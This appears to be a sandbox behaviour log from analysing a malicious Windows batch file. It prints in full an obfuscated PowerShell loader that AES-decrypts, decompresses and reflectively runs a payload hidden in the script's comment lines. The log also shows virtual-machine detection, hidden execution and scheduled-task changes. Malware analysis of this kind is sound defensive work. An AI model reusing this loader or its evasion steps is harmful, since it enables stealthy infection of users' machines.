Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
